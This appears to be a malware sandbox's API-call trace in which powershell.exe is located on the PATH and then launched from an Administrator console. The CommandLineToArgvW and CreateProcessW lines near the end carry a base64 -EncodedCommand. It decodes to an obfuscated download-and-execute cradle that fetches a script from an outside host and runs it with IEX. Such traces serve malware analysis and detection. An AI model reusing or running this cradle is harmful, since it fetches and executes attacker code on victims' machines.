	[0646.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.271] SetErrorMode (uMode=0x1) returned 0x1
	[0646.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.272] SetErrorMode (uMode=0x1) returned 0x1
	[0646.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.272] SetErrorMode (uMode=0x1) returned 0x1
	[0646.272] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.272] SetErrorMode (uMode=0x1) returned 0x1
	[0646.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.273] SetErrorMode (uMode=0x1) returned 0x1
	[0646.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.273] SetErrorMode (uMode=0x1) returned 0x1
	[0646.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.273] SetErrorMode (uMode=0x1) returned 0x1
	[0646.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.274] SetErrorMode (uMode=0x1) returned 0x1
	[0646.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.274] SetErrorMode (uMode=0x1) returned 0x1
	[0646.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.274] SetErrorMode (uMode=0x1) returned 0x1
	[0646.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.275] SetErrorMode (uMode=0x1) returned 0x1
	[0646.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.275] SetErrorMode (uMode=0x1) returned 0x1
	[0646.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.275] SetErrorMode (uMode=0x1) returned 0x1
	[0646.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.276] SetErrorMode (uMode=0x1) returned 0x1
	[0646.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.276] SetErrorMode (uMode=0x1) returned 0x1
	[0646.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.277] SetErrorMode (uMode=0x1) returned 0x1
	[0646.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.277] SetErrorMode (uMode=0x1) returned 0x1
	[0646.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.277] SetErrorMode (uMode=0x1) returned 0x1
	[0646.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.278] SetErrorMode (uMode=0x1) returned 0x1
	[0646.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.278] SetErrorMode (uMode=0x1) returned 0x1
	[0646.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.278] SetErrorMode (uMode=0x1) returned 0x1
	[0646.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.279] SetErrorMode (uMode=0x1) returned 0x1
	[0646.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.279] SetErrorMode (uMode=0x1) returned 0x1
	[0646.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.279] SetErrorMode (uMode=0x1) returned 0x1
	[0646.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.280] SetErrorMode (uMode=0x1) returned 0x1
	[0646.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.280] SetErrorMode (uMode=0x1) returned 0x1
	[0646.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.281] SetErrorMode (uMode=0x1) returned 0x1
	[0646.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.281] SetErrorMode (uMode=0x1) returned 0x1
	[0646.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0646.281] SetErrorMode (uMode=0x1) returned 0x1
	[0646.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.282] SetErrorMode (uMode=0x1) returned 0x1
	[0646.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0646.282] SetErrorMode (uMode=0x1) returned 0x1
	[0646.282] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.282] SetErrorMode (uMode=0x1) returned 0x1
	[0646.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0646.283] SetErrorMode (uMode=0x1) returned 0x1
	[0646.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.283] SetErrorMode (uMode=0x1) returned 0x1
	[0646.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0646.283] SetErrorMode (uMode=0x1) returned 0x1
	[0646.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.284] SetErrorMode (uMode=0x1) returned 0x1
	[0646.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0646.284] SetErrorMode (uMode=0x1) returned 0x1
	[0646.284] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x21ed80
	[0646.285] FindNextFileW (in: hFindFile=0x21ed80, lpFindFileData=0x1c5fdeb0 | out: lpFindFileData=0x1c5fdeb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0646.286] FindClose (in: hFindFile=0x21ed80 | out: hFindFile=0x21ed80) returned 1
	[0646.286] SetErrorMode (uMode=0x1) returned 0x1
	[0646.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c5fdfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0646.287] SetErrorMode (uMode=0x1) returned 0x1
	[0646.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c5fe1d0 | out: lpFileInformation=0x1c5fe1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0646.287] SetErrorMode (uMode=0x1) returned 0x1
	[0646.288] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0646.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0646.288] CoTaskMemFree (pv=0x20e0d0) 
	[0646.290] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0646.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0646.290] CoTaskMemFree (pv=0x20e0d0) 
	[0646.293] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0646.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0646.293] CoTaskMemFree (pv=0x20e0d0) 
	[0646.302] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0646.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0646.303] CoTaskMemFree (pv=0x20e0d0) 
	[0648.373] CoTaskMemAlloc (cb=0x3b) returned 0x218150
	[0648.373] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c5fe3b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c5fe3b8) returned 0x4550
	[0648.375] CoTaskMemFree (pv=0x218150) 
	[0648.378] GetConsoleWindow () returned 0x103ee
	[0648.386] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0648.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0648.386] CoTaskMemFree (pv=0x20e0d0) 
	[0648.387] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0648.387] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0648.387] CoTaskMemFree (pv=0x20e0d0) 
	[0648.393] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0648.393] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0648.393] CoTaskMemFree (pv=0x20e0d0) 
	[0648.395] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c5fe400 | out: pNumArgs=0x1c5fe400) returned 0x192eb0*=""
	[0648.397] lstrlenW (lpString="-EncodedCommand") returned 15
	[0648.398] CoTaskMemAlloc (cb=0x22) returned 0x1b7871d0
	[0648.398] RtlMoveMemory (in: Destination=0x1b7871d0, Source=0x192ed2, Length=0x20 | out: Destination=0x1b7871d0) 
	[0648.398] CoTaskMemFree (pv=0x1b7871d0) 
	[0648.398] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0648.398] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7795b0
	[0648.398] RtlMoveMemory (in: Destination=0x1b7795b0, Source=0x192ef2, Length=0x2f2 | out: Destination=0x1b7795b0) 
	[0648.398] CoTaskMemFree (pv=0x1b7795b0) 
	[0648.399] LocalFree (hMem=0x192eb0) returned 0x0
	[0648.400] CoTaskMemAlloc (cb=0x804) returned 0x1b7951d0
	[0648.400] GetConsoleTitleW (in: lpConsoleTitle=0x1b7951d0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0650.149] CoTaskMemFree (pv=0x1b7951d0) 
	[0650.158] CoTaskMemAlloc (cb=0x38e) returned 0x192eb0
	[0650.158] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c5fe360*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e6f260 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e6f260*(hProcess=0x398, hThread=0x34c, dwProcessId=0x1d00, dwThreadId=0x1d04)) returned 1
	[0650.300] CoTaskMemFree (pv=0x192eb0) 
	[0650.302] CloseHandle (hObject=0x34c) returned 1
	[0650.302] CoTaskMemAlloc (cb=0x3b) returned 0x218150
	[0650.302] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c5fe408, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c5fe408) returned 0x4550
	[0650.302] CoTaskMemFree (pv=0x218150) 
